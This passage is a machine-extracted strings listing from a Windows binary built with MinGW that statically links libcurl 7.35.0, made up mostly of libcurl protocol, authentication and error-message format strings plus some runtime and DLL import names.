(#%ld) with host %s</pre><pre>Couldn't resolve host '%s'</pre><pre>Couldn't resolve proxy '%s'</pre><pre>Connection #%ld to host %s left intact</pre><pre>Curl_poll(%d ds, %d ms)</pre><pre>Internal error clearing splay node = %d</pre><pre>Internal error removing splay node = %d</pre><pre>Pipe broke: handle 0x%p, url = %s</pre><pre>In state %d with no easy_conn, bail out!</pre><pre>Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received</pre><pre>Operation timed out after %ld milliseconds with %I64d bytes received</pre><pre>#HttpOnly_</pre><pre>23[^;</pre><pre>=]=I99[^;</pre><pre>httponly</pre><pre>skipped cookie with bad tailmatch domain: %s</pre><pre>%s cookie %s="%s" for domain %s, path %s, expire %I64d</pre><pre># Netscape HTTP Cookie File</pre><pre># http://curl.haxx.se/docs/http-cookies.html</pre><pre># This file was generated by libcurl! Edit at your own risk.</pre><pre># Fatal libcurl error</pre><pre>WARNING: failed to save cookies in %s</pre><pre>%d.%d.%d.%d</pre><pre>CURLSHcode unknown</pre><pre>Protocol option is unsupported</pre><pre>Protocol is unsupported</pre><pre>Socket is unsupported</pre><pre>Operation not supported</pre><pre>Address family not supported</pre><pre>Protocol family not supported</pre><pre>Winsock version not supported</pre><pre>Unknown error %d (%#x)</pre><pre>Please call curl_multi_perform() soon</pre><pre>Unsupported protocol</pre><pre>URL using bad/illegal format or missing URL</pre><pre>A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.</pre><pre>FTP: weird server reply</pre><pre>FTP: The server failed to connect to data port</pre><pre>FTP: unknown PASS reply</pre><pre>FTP: Accepting server connect has timed out</pre><pre>FTP: unknown PASV reply</pre><pre>FTP: unknown 227 response format</pre><pre>FTP: can't figure out the host in the PASV response</pre><pre>FTP: couldn't set file type</pre><pre>FTP: couldn't retrieve (RETR failed) the specified 
file</pre><pre>HTTP response code said error</pre><pre>FTP: command PORT failed</pre><pre>FTP: command REST failed</pre><pre>Operation was aborted by an application callback</pre><pre>A libcurl function was given a bad argument</pre><pre>An unknown option was passed in to libcurl</pre><pre>SSL peer certificate or SSH remote key was not OK</pre><pre>Problem with the local SSL certificate</pre><pre>Peer certificate cannot be authenticated with given CA certificates</pre><pre>Unrecognized or bad HTTP Content or Transfer-Encoding</pre><pre>Invalid LDAP URL</pre><pre>Login denied</pre><pre>TFTP: File Not Found</pre><pre>TFTP: Access Violation</pre><pre>TFTP: Illegal operation</pre><pre>TFTP: Unknown transfer ID</pre><pre>TFTP: No such user</pre><pre>Caller must register CURLOPT_CONV_ callback options</pre><pre>Problem with the SSL CA cert (path? access rights?)</pre><pre>Error in the SSH layer</pre><pre>Issuer check against peer certificate failed</pre><pre>FTP: The server did not accept the PRET command.</pre><pre>Unable to parse FTP file list</pre><pre>0123456789</pre><pre>%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s</pre><pre>Curl_ipv4_resolve_r failed for %s</pre><pre>%sAuthorization: Basic %s</pre><pre>HTTP/</pre><pre>Avoided giant realloc for header (max is %d)!</pre><pre>The requested URL returned error: %d</pre><pre>%s auth using %s with user '%s'</pre><pre>%s, d %s M d:d:d GMT</pre><pre>If-Modified-Since: %s</pre><pre>If-Unmodified-Since: %s</pre><pre>Last-Modified: %s</pre><pre>Referer: %s</pre><pre>Accept-Encoding: %s</pre><pre>Host: %s%s%s</pre><pre>Host: %s%s%s:%hu</pre><pre>ftp://</pre><pre>Range: bytes=%s</pre><pre>Content-Range: bytes %s%I64d/%I64d</pre><pre>Content-Range: bytes %s/%I64d</pre><pre>ftp://%s:%s@%s</pre><pre>%s HTTP/%s</pre><pre>%s%s%s%s%s%s%s%s%s%s%s</pre><pre>%s%s=%s</pre><pre>Internal HTTP POST error!</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>Failed sending HTTP POST request</pre><pre>Failed sending HTTP 
request</pre><pre>Chunky upload is not supported by HTTP 1.0</pre><pre>HTTP error before end of send, stop sending</pre><pre>HTTP/%d.%d =</pre><pre>HTTP =</pre><pre>RTSP/%d.%d =</pre><pre>The requested URL returned error: %s</pre><pre>HTTP 1.0, assume close after body</pre><pre>HTTP/1.0 proxy connection set to keep alive!</pre><pre>HTTP/1.1 proxy connection set close!</pre><pre>HTTP/1.0 connection set to keep alive!</pre><pre>USER %s</pre><pre>PBSZ %d</pre><pre>Failure sending QUIT command: %s</pre><pre>ftp server doesn't support SIZE</pre><pre>RETR %s</pre><pre>Connect data stream passively</pre><pre>APPE %s</pre><pre>STOR %s</pre><pre>SIZE %s</pre><pre>getsockname() failed: %s</pre><pre>failed to resolve the address provided to PORT: %s</pre><pre>bind(port=%hu) on non-local address failed: %s</pre><pre>bind(port=%hu) failed: %s</pre><pre>bind() failed, we ran out of ports!</pre><pre>socket failure: %s</pre><pre>%s |%d|%s|%hu|</pre><pre>Failure sending EPRT command: %s</pre><pre>,%d,%d</pre><pre>%s %s</pre><pre>Failure sending PORT command: %s</pre><pre>Uploading to a URL without a file name!</pre><pre>FTPS not supported!</pre><pre>PASS %s</pre><pre>ACCT %s</pre><pre>Access denied: d</pre><pre>%c%c%c%u%c</pre><pre>Illegal port number in EPSV reply</pre><pre>%d,%d,%d,%d,%d,%d</pre><pre>Skips %d.%d.%d.%d for data connection, uses %s instead</pre><pre>Bad PASV/EPSV response: d</pre><pre>Can't resolve proxy host %s:%hu</pre><pre>Can't resolve new host %s:%hu</pre><pre>Connecting to %s (%s) port %d</pre><pre>TYPE %c</pre><pre>MDTM %s</pre><pre>CWD %s</pre><pre>PRET %s</pre><pre>PRET STOR %s</pre><pre>PRET RETR %s</pre><pre>REST %d</pre><pre>FTP response timeout</pre><pre>FTP response aborted due to select/poll error: %d</pre><pre>Preparing for accepting server on data port</pre><pre>Got a d ftp-server response when 220 was expected</pre><pre>unsupported parameter to CURLOPT_FTPSSLAUTH: %d</pre><pre>AUTH %s</pre><pre>ACCT rejected by server: d</pre><pre>PROT 
%c</pre><pre>Entry path is '%s'</pre><pre>QUOT command failed with d</pre><pre>MKD %s</pre><pre>Failed to MKD dir: d</pre><pre>dddddd</pre><pre>ddd d:d:d GMT</pre><pre>Last-Modified: %s, d %s M d:d:d GMT</pre><pre>unsupported MDTM reply format</pre><pre>Got a d response code instead of the assumed 200</pre><pre>PRET command not accepted: d</pre><pre>Failed to do PORT</pre><pre>RETR response: d</pre><pre>Failed FTP upload: </pre><pre>Wildcard - START of "%s"</pre><pre>Wildcard - "%s" skipped by user</pre><pre>ftp_perform ends with SECONDARY: %d</pre><pre>Remembering we are in dir "%s"</pre><pre>Failure sending ABOR command: %s</pre><pre>server did not report OK, got %d</pre><pre>QUOT string not accepted: %s</pre><pre>PORT</pre><pre>%s IAC %s</pre><pre>%s IAC %d</pre><pre>%s %s %s</pre><pre>%s %s %d</pre><pre>%s %d %d</pre><pre>Sending data failed (%d)</pre><pre>%s IAC SB</pre><pre>%s (unsupported)</pre><pre>%d (unknown)</pre><pre>%c%c%c%c%s%c%c</pre><pre>%c%c%c%c</pre><pre>7[^,],7s</pre><pre>%c%s%c%s</pre><pre>USER,%s</pre><pre>7[^= ]%*[ =]%5s</pre><pre>Syntax error in telnet option: %s</pre><pre>Unknown telnet option %s</pre><pre>WSAStartup failed (%d)</pre><pre>insufficient winsock version to support telnet</pre><pre>failed to load WS2_32.DLL (%d)</pre><pre>failed to find WSACreateEvent function (%d)</pre><pre>failed to find WSACloseEvent function (%d)</pre><pre>failed to find WSAEventSelect function (%d)</pre><pre>failed to find WSAEnumNetworkEvents function (%d)</pre><pre>WSACreateEvent failed (%d)</pre><pre>WSAEnumNetworkEvents failed (%d)</pre><pre>WSACloseEvent failed (%d)</pre><pre>FreeLibrary(wsock2) failed (%d)</pre><pre>WS2_32.DLL</pre><pre>CLIENT libcurl 7.35.0</pre><pre>MATCH %s %s %s</pre><pre>DEFINE %s %s</pre><pre>LDAP local: LDAP Vendor = %s ; LDAP Version = %d</pre><pre>LDAP local: %s</pre><pre>LDAP local: Cannot connect to %s:%ld</pre><pre>LDAP local: ldap_simple_bind_s %s</pre><pre>LDAP remote: %s</pre><pre>There are more than %d 
entries</pre><pre>LDAP local: trying to establish %s connection</pre><pre>Couldn't open file %s</pre><pre>Can't open %s for writing</pre><pre>Can't get the size of %s</pre><pre>Received last DATA packet block %d again.</pre><pre>Received unexpected DATA packet block %d, expecting block %d</pre><pre>Timeout waiting for block %d ACK. Retries = %d</pre><pre>tftp_rx: internal error</pre><pre>set timeouts for state %d; Total %ld, retry %d maxtry %d</pre><pre>Received ACK for block %d, expecting %d</pre><pre>tftp_tx: giving up waiting for block %d ack</pre><pre>tftp_tx: internal error, event: %i</pre><pre>bind() failed; %s</pre><pre>%s%c%s%c</pre><pre>tftp_send_first: internal error</pre><pre>TFTP finished</pre><pre>TFTP response timeout</pre><pre>got option=(%s) value=(%s)</pre><pre>blksize is larger than max supported</pre><pre>%s (%d)</pre><pre>blksize is smaller than min supported</pre><pre>%s (%ld)</pre><pre>%s (%d) %s (%d)</pre><pre>invalid tsize -:%s:- value in OACK packet</pre><pre>TFTP</pre><pre>%cd</pre><pre>LIST "%s" *</pre><pre>FETCH %s BODY[%s]</pre><pre>LOGIN</pre><pre>LOGIN %s %s</pre><pre>AUTHENTICATE %s %s</pre><pre>AUTHENTICATE %s</pre><pre>No known authentication mechanisms supported!</pre><pre>IMAPS not supported!</pre><pre>Access denied: %d</pre><pre>APPEND %s (\Seen) {%I64d}</pre><pre>SELECT %s</pre><pre>LOGINDISABLED</pre><pre>STARTTLS not supported.</pre><pre>STARTTLS denied. %c</pre><pre>Access denied. 
%c</pre><pre>Authentication failed: %d</pre><pre>AUTH %s %s</pre><pre>POP3S not supported!</pre><pre>APOP %s %s</pre><pre>STLS not supported.</pre><pre>RCPT TO:%s</pre><pre>RCPT TO:<%s></pre><pre>SMTPS not supported!</pre><pre>Got unexpected smtp-server response: %d</pre><pre>EHLO %s</pre><pre>HELO %s</pre><pre>Remote access denied: %d</pre><pre>Command failed: %d</pre><pre>MAIL failed: %d</pre><pre>RCPT failed: %d</pre><pre>DATA failed: %d</pre><pre>MAIL FROM:%s</pre><pre>MAIL FROM:%s AUTH=%s</pre><pre>MAIL FROM:%s AUTH=%s SIZE=%s</pre><pre>MAIL FROM:%s SIZE=%s</pre><pre>SMTP</pre><pre>Refusing to issue an RTSP request [%s] without a session ID.</pre><pre>Transport:</pre><pre>Transport: %s</pre><pre>Refusing to issue an RTSP SETUP without a Transport: header.</pre><pre>Range: %s</pre><pre>%s %s RTSP/1.0</pre><pre>Session: %s</pre><pre>%s%s%s%s%s%s</pre><pre>Unable to read the CSeq header: [%s]</pre><pre>Got RTSP Session ID Line [%s], but wanted ID [%s]</pre><pre>Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds</pre><pre>%%X</pre><pre>xxxx</pre><pre>%s:%s:%s</pre><pre>%s:%.*s</pre><pre>%s:%s:x:%s:%s:%s</pre><pre>%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"</pre><pre>%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"</pre><pre>%s, opaque="%s"</pre><pre>%s, algorithm="%s"</pre><pre>SOCKS4 communication to %s:%d</pre><pre>SOCKS4 connect to %s (locally resolved)</pre><pre>Failed to resolve "%s" for SOCKS4 connect.</pre><pre>SOCKS4%s request granted.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. 
(%d), request rejected because the client program and identd report different user-ids.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.</pre><pre>User was rejected by the SOCKS5 server (%d %d).</pre><pre>SOCKS5 GSSAPI per-message authentication is not supported.</pre><pre>No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)</pre><pre>Failed to resolve "%s" for SOCKS5 connect.</pre><pre>Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)</pre><pre>Can't complete SOCKS5 connection to %s:%d. (%d)</pre><pre>Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)</pre><pre>Establish HTTP proxy tunnel to %s:%hu</pre><pre>%s:%hu</pre><pre>%s%s%s:%hu</pre><pre>Host: %s</pre><pre>CONNECT %s HTTP/%s</pre><pre>%s%s%s%s</pre><pre>HTTP/1.%d %d</pre><pre>TUNNEL_STATE switched to: %d</pre><pre>Received HTTP code %d from proxy after CONNECT</pre><pre>login</pre><pre>password</pre><pre>operation aborted by callback</pre><pre>Read callback asked for PAUSE when not supported!</pre><pre>seek callback returned error %d</pre><pre>the ioctl callback returned %d</pre><pre>ioctl callback returned error %d</pre><pre>Rewinding stream by : %zd bytes on url %s (zero-length body)</pre><pre>Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)</pre><pre>HTTP server doesn't seem to support byte ranges. 
Cannot resume.</pre><pre>Simulate a HTTP 304 response!</pre><pre>Problem (%d) in the Chunked-Encoded data</pre><pre>Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)</pre><pre>Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d</pre><pre>No URL set!</pre><pre>[^?&/:]://%c</pre><pre>Issue another request to this URL: '%s'</pre><pre>Violate RFC 2616/10.3.2 and switch from POST to GET</pre><pre>Violate RFC 2616/10.3.3 and switch from POST to GET</pre><pre>Disables POST, goes with %s</pre><pre>Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s</pre><pre>Site %s:%d is pipeline blacklisted</pre><pre>Server %s is not blacklisted</pre><pre>Server %s is blacklisted</pre><pre>d:d:d</pre><pre>d:d</pre><pre>%c%c==</pre><pre>%c%c%c=</pre><pre>------------------------xx</pre><pre>; filename="%s"</pre><pre>%s; boundary=%s</pre><pre>Content-Type: multipart/mixed, boundary=%s</pre><pre>Content-Type: %s</pre><pre>couldn't open file "%s"</pre><pre>--%s--</pre><pre>.jpeg</pre><pre>.html</pre><pre>0123456789-</pre><pre>%s xxxxxxxxxxxxxxxx</pre><pre>%s/%s</pre><pre>username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s</pre><pre>user=%s</pre><pre>auth=Bearer %s</pre><pre>%s near '%s'</pre><pre>%s near end of file</pre><pre>unable to decode byte 0x%x at position %d</pre><pre>control character 0x%x</pre><pre>invalid Unicode '\uX\uX'</pre><pre>invalid Unicode '\uX'</pre><pre>end == saved_text lex->saved_text.length</pre><pre>unable to open %s: %s</pre><pre>\ux</pre><pre>\ux\ux</pre><pre>Assertion failed: (%s), file %s, line %d</pre><pre>M%p %d %s</pre><pre>M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s</pre><pre>once %p is %d</pre><pre>T%p %d %s</pre><pre>T%p %d V=%0X H=%p %s</pre><pre>C%p %d %s</pre><pre>C%p %d V=%0X B=%d b=%p w=%ld %s</pre><pre>RWL%p %d %s</pre><pre>RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s</pre><pre>_matherr(): %s in 
%s(%g, %g) (retval=%g)</pre><pre>VirtualQuery failed for %d bytes at address %p</pre><pre>VirtualProtect failed with code 0x%x</pre><pre>Unknown pseudo relocation protocol version %d.</pre><pre>Unknown pseudo relocation bit size %d.</pre><pre>unknown option -- %s</pre><pre>unknown option -- %c</pre><pre>option requires an argument -- %s</pre><pre>option requires an argument -- %c</pre><pre>jZGCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)</pre><pre>GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)</pre><pre>PeekNamedPipe</pre><pre>_acmdln</pre><pre>_amsg_exit</pre><pre>ldap_msgfree</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>msvcrt.dll</pre><pre>USER32.dll</pre><pre>wldap32.dll</pre><pre>WS2_32.dll</pre><pre>"@"@"@"@</pre><pre>File: %ws, Line %u</pre></SSSh></pre></SSSh></pre></SSSh>